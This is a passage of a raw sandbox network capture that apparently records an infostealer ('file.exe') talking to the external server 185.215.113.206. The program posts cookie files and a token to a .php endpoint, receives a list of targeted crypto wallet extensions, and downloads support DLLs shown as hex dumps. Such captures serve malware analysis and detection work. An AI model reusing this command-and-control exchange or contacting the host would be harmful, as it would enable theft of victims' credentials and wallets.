                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.650948048 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Content-Length: 108
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                                                      Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.675273895 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEB
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 6467
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:19.675422907 CET6467OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61
                                                                                                                                                                                                                                                                                      Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.409200907 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:19 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.437792063 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654794931 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:20 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 1106998
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654835939 CET224INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654894114 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.649832185.215.113.206805740C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.855156898 CET202OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIE
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 991
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.855192900 CET991OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61
                                                                                                                                                                                                                                                                                      Data Ascii: ------DAKFCGIJKJKFHIDHIIIEContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------DAKFCGIJKJKFHIDHIIIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.097074986 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.217137098 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFI
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="file"------AFHDAEGHDGDBGDGDAAFI--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:30.950953007 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      2192.168.2.649910185.215.113.206805740C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.996597052 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEB
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 3087
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:36.996597052 CET3087OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61
                                                                                                                                                                                                                                                                                      Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.171128988 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.376069069 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="file"------CGIDAAAKJJDBGCBFCBGI--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:39.092084885 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.246033907 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.469985008 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:40 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 685392
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470001936 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                                                      Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470016003 CET1236INData Raw: 01 00 00 e8 3f 0b 08 00 83 c4 04 85 c0 74 30 89 c7 89 80 38 01 00 00 83 c7 0f 31 f6 83 e7 f0 74 6b 8b 45 14 8b 55 10 8b 5d 0c 8b 4d 08 85 db 74 1f f2 0f 10 03 f2 0f 11 87 30 01 00 00 eb 25 68 13 e0 ff ff e8 f2 0a 08 00 83 c4 04 31 f6 eb 3c c7 87
                                                                                                                                                                                                                                                                                      Data Ascii: ?t081tkEU]Mt0%h1<40jRjjPQWt8^_[]UWVut }jVt8h^_]USWVPL$,M01D$HD$4r
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470032930 CET1236INData Raw: 24 1c 00 00 00 00 89 44 24 08 c7 44 24 24 00 00 00 00 c7 44 24 20 00 00 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: $D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$\$\$T$1%1%1T$D|$@|$t\$(
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470046997 CET1236INData Raw: c1 09 ca c1 fa 1f f7 db 83 e3 07 31 ff 39 d9 f7 d2 0f 44 fa 89 45 d0 89 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8
                                                                                                                                                                                                                                                                                      Data Ascii: 19DEEE|0)U|2!!)]|3)|3!)}|7!!)U|2)|2!!)M|1t/EU;U
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470062971 CET672INData Raw: 57 56 68 0c 01 00 00 e8 bf fc 07 00 83 c4 04 31 f6 85 c0 74 6c 89 c7 8b 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 c4 08 85 c0 74 2c 8b 1f 85 db 74 14
                                                                                                                                                                                                                                                                                      Data Ascii: WVh1tlEGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVP
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470078945 CET1236INData Raw: 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 50 68 0c 01 00 00 e8 fe f9 07 00 83 c4 04 31 ff 85 c0 74 71 89 c6 8b 5d 08 c7 40 08 01 00 00 00 8b 43 04 89 46 04 8b 03 89 45 f0 8b 43 04 8b 48
                                                                                                                                                                                                                                                                                      Data Ascii: uuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]UhV1]Uh6]
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470097065 CET1236INData Raw: 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 02 32 14 0f 8b 4d e4 88 51 02 83 fe 03 0f 84 ac 00 00 00 8b 45 ec 04 04 0f b6 c8 8b 7d f0 8a 14
                                                                                                                                                                                                                                                                                      Data Ascii: E}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$7u]S2]S
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.470113039 CET1236INData Raw: d2 f6 c2 01 0f 84 9b 00 00 00 66 0f 6f 1d d0 20 08 10 66 0f fe d8 0b 75 cc 8b 45 10 66 0f 6e 2c 30 66 0f 6e 64 30 04 66 0f ef f6 66 0f 60 ee 66 0f 61 ee 66 0f 60 e6 66 0f 61 e6 66 0f 72 f0 17 66 0f 6f 35 e0 20 08 10 66 0f fe c6 f3 0f 5b c0 66 0f
                                                                                                                                                                                                                                                                                      Data Ascii: fo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU9UEuUM}]?uu]}
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.471064091 CET1236INData Raw: 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89 e5 53 57 56 81 ec 5c 01 00 00 89 8d dc fe ff ff 8b 32 89 95 74 ff ff ff 89 b5 f4 fe ff ff 8b 01 89 85 9c fe ff ff 89 c7 01 f7 8b 52 04 89 95 f8
                                                                                                                                                                                                                                                                                      Data Ascii: 7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31tQIU]U1P
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.426975012 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.656584978 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:41 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 608080
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.109792948 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.330861092 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:42 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Content-Length: 450024
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
